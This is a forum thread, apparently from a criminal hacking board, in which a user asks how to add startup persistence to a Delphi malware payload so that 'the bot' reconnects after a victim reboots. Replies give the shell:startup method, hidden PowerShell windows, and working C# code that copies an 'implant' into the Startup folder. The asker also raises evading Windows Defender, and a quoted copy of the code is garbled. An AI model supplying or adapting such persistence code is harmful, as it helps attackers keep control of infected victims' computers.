What's new
By:
Filters
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Add startup to an EXE payload?

E

Evild34d

Midle Weight
Депозит
$0
Hi,

I have a malware payload which is coded in delphi, without startup. I need your help to add startup to the payload(exe), any code/method that work please! only adding startup is enough.

Thanks for any help
 
proxy сказал(а):
copy the exe file to the 'shell:startup' folder

Посмотреть вложение 77129
Click to expand...

So using this method the startup feature will connect the bot again when the user pc restart? Thanks
 
Evild34d сказал(а):
So using this method the startup feature will connect the bot again when the user pc restart? Thanks
Click to expand...

-WindowStyle Hidden

https:// www(dot)hanselman(dot)com /blog/running-powershell-scripts-from-the-command-line-in-a-hidden-window

https:// www(dot)codeproject(dot)com /Questions/884878/how-to-start-the-windows-application-when-the-star

reaction is appreciated
 
C#:
Скопировать в буфер обмена
using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
internal sealed class Startup
{

/// <summary>
/// Current executable location
/// </summary>
private static readonly FileInfo CurrentExecutable = new FileInfo(Assembly.GetExecutingAssembly().Location);

/// <summary>
/// Shell startup directory path
/// Any file in this dir will be executed after user logged in.
/// </summary>
private static readonly DirectoryInfo ShellStartupDirectory = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup));


/// <summary>
/// Installs the application by copying the current executable to the Shell Startup directory.
/// </summary>
public static string Install()
{
FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

// Create startup dir if not exists
if (!ShellStartupDirectory.Exists)
{
ShellStartupDirectory.Create();
}

// If the executable does not already exist in the Shell Startup directory, copy it there.
if (!ImplantShellStartupExecutable.Exists)
{
CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
Console.WriteLine("Implant installed");
#endif
return ImplantShellStartupExecutable.FullName;
}
return null;
}
}
}
 
EternityTeam сказал(а):
C#:
Скопировать в буфер обмена
using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
internal sealed class Startup
{




CurrentExecutable AssemblyLocation





ShellStartupDirectory EnvironmentEnvironmentSpecialFolderStartup);





public static string Install()
{
FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

// Create startup dir if not exists
if (!ShellStartupDirectory.Exists)
{
ShellStartupDirectory.Create();
}

// If the executable does not already exist in the Shell Startup directory, copy it there.
if (!ImplantShellStartupExecutable.Exists)
{
CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
Console.WriteLine("Implant installed");
#endif
return ImplantShellStartupExecutable.FullName;
}
return null;
}
}
}
Нажмите, чтобы раскрыть...
Click to expand...

Thanks but this will not cause WD detection!
 
You must log in or register to reply here.
Top